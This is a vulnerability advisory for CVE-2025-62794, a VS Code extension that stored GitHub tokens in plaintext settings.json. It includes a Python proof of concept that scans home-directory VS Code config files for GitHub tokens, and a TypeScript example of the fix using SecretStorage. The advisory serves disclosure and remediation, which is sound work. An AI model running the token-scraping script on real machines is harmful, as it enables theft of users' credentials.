Security Vulnerability Report
CVE-2025-62794 (CVSS 3.8, LOW)

Published: 2025-10-28 21:15:41
Last Modified: 2026-04-15 00:35:42

Description

GitHub Workflow Updater is a VS Code extension that automatically pins GitHub Actions to specific commits for enhanced security. Before 0.0.7, any provided GitHub token was stored in plaintext in the editor configuration as JSON on disk, rather than through the more secure "securestorage" API. An attacker with read-only access to your home directory could have read this token and used it to perform actions with that token. Update to 0.0.7.

CVSS Details

CVSS Score: 3.8
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
(Attack vector: local; attack complexity: low; privileges required: low; user interaction: none; scope: changed; confidentiality impact: low; integrity and availability impact: none.)

Configurations (Affected Products)

No configuration (CPE) data available.
Affected: GitHub Workflow Updater VS Code Extension < 0.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62794 PoC - GitHub Workflow Updater Token Exposure
# This PoC demonstrates how an attacker with read access to the home directory
# can extract plaintext GitHub tokens stored by the vulnerable extension
import os
import json
import glob


def find_vscode_config():
    """Search for VS Code configuration files"""
    home = os.path.expanduser("~")
    config_paths = [
        os.path.join(home, ".config", "Code", "User", "settings.json"),
        os.path.join(home, ".vscode", "settings.json"),
        os.path.join(home, "AppData", "Roaming", "Code", "User", "settings.json"),
    ]
    # Also search for any extension settings
    for path in glob.glob(os.path.join(home, ".vscode", "**", "*.json"), recursive=True):
        config_paths.append(path)
    return config_paths


def extract_tokens(config_file):
    """Extract potential GitHub tokens from config file"""
    tokens = []
    try:
        with open(config_file, 'r') as f:
            data = json.load(f)
        # Search for common GitHub token field names
        token_fields = ['github-token', 'github.token', 'gh-token',
                        'githubWorkflowUpdater.token', 'accessToken']
        for field in token_fields:
            if field in data and isinstance(data[field], str):
                if data[field].startswith('ghp_') or data[field].startswith('github_pat_'):
                    tokens.append({
                        'field': field,
                        'token': data[field],
                        'source': config_file
                    })
    except (json.JSONDecodeError, FileNotFoundError, PermissionError):
        pass
    return tokens


def main():
    print("CVE-2025-62794 - GitHub Workflow Updater Token Extraction PoC")
    print("=" * 60)
    config_paths = find_vscode_config()
    all_tokens = []
    for config_path in config_paths:
        tokens = extract_tokens(config_path)
        all_tokens.extend(tokens)
    if all_tokens:
        print(f"[!] Found {len(all_tokens)} potential GitHub tokens:")
        for i, token_info in enumerate(all_tokens, 1):
            print(f"\nToken {i}:")
            print(f"  Field: {token_info['field']}")
            print(f"  Token: {token_info['token'][:10]}...{token_info['token'][-4:]}")
            print(f"  Source: {token_info['source']}")
    else:
        print("[-] No exposed tokens found in typical locations")
    print("\n[!] Note: Update to GitHub Workflow Updater 0.0.7+ to fix this vulnerability")


if __name__ == "__main__":
    main()
```
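The storage defect the description and the PoC above turn on is the choice of API inside the extension: writing the token through the settings API lands it in settings.json, while VS Code's `vscode.SecretStorage` (reached as `ExtensionContext.secrets`) keeps it in the OS keychain. The following is an added TypeScript example, not the extension's own code; the `vscode` module is replaced by minimal interfaces and in-memory stand-ins so it runs offline, and the setting and secret key names are assumptions.

```typescript
// Added example, not the extension's own code: the storage pattern behind
// CVE-2025-62794 in its vulnerable and fixed forms. The vscode module is not
// available here, so the two API surfaces are declared as minimal interfaces
// and driven by in-memory stand-ins; the setting and secret key names are assumed.
interface WorkspaceConfiguration {          // subset of vscode.WorkspaceConfiguration
  get(section: string): string | undefined;
  update(section: string, value: unknown, global?: boolean): Promise<void>;
}
interface SecretStorage {                   // subset of vscode.SecretStorage
  store(key: string, value: string): Promise<void>;
  get(key: string): Promise<string | undefined>;
}
const SETTING_KEY = "githubToken";                       // assumed legacy setting name
const SECRET_KEY = "githubWorkflowUpdater.githubToken";  // assumed secret name
// Vulnerable (pre-0.0.7 behaviour as the advisory describes it): update() on the
// global target writes the token in plaintext into the user's settings.json.
export function saveTokenInsecure(cfg: WorkspaceConfiguration, token: string): Promise<void> {
  return cfg.update(SETTING_KEY, token, true);
}
// Fixed: keep the token in SecretStorage (backed by the OS keychain) and scrub
// any plaintext copy an older version left behind in settings.json.
export async function saveTokenSecure(cfg: WorkspaceConfiguration, secrets: SecretStorage,
                                      token: string): Promise<void> {
  await secrets.store(SECRET_KEY, token);
  if (cfg.get(SETTING_KEY) !== undefined) await cfg.update(SETTING_KEY, undefined, true);
}
export class FakeConfig implements WorkspaceConfiguration {
  settings: Record<string, unknown> = {};   // what settings.json would contain
  get(section: string) { return this.settings[section] as string | undefined; }
  async update(section: string, value: unknown) {
    if (value === undefined) delete this.settings[section]; else this.settings[section] = value;
  }
  onDisk(): string { return JSON.stringify(this.settings); }  // the file an attacker reads
}
export class FakeSecrets implements SecretStorage {
  private vault = new Map<string, string>();
  async store(key: string, value: string) { this.vault.set(key, value); }
  async get(key: string) { return this.vault.get(key); }
}
// Moves a constructed token from the vulnerable layout to the fixed one and
// returns both settings.json snapshots plus what SecretStorage holds afterwards.
export async function demo(): Promise<{ before: string; after: string; vaulted: string | undefined }> {
  const cfg = new FakeConfig(), secrets = new FakeSecrets();
  const token = "ghp_CONSTRUCTED_EXAMPLE_TOKEN_000000000000";  // constructed, not a real token
  await saveTokenInsecure(cfg, token);
  const before = cfg.onDisk();
  await saveTokenSecure(cfg, secrets, token);
  return { before, after: cfg.onDisk(), vaulted: await secrets.get(SECRET_KEY) };
}
```

After `demo()` the `before` snapshot contains the token in clear and `after` is `{}`, which is the on-disk difference between the affected and fixed versions.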

References

Weakness: CWE-522 (Insufficiently Protected Credentials)

https://github.com/RichardoC/github-workflow-updater-extension/commit/b9518c38ac6bc2a9fda2242e6daef17f7184ad1f
https://github.com/RichardoC/github-workflow-updater-extension/security/advisories/GHSA-679x-97jw-8vjp
https://github.com/microsoft/vscode-discussions/discussions/748
